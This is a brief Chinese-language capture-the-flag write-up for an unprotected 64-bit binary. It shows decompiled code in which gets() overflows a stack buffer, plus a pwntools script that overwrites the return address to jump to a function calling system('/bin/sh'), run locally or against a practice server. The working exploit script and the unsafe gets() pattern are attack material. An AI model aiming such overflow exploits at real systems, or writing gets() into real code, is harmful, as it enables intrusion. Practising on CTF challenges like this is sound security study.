64位程序,没有开保护
主函数,get函数直接溢出
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [sp+1h] [bp-Fh]@1
puts("please input");
gets(&s, argv);
puts(&s);
puts("ok,bye!!!");
return 0;
}
fun函数(溢出位置)
int fun()
{
return system("/bin/sh");
}
溢出到其他位置就行了
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
content = 1
def main():
if content == 1:
peiqi = process("pwn1")
else:
peiqi = remote("node3.buuoj.cn",28330)
payload = b'a' * (0x0f + 8)
payload = payload + p64(0x40118A)
peiqi.sendline(payload)
peiqi.interactive()
main()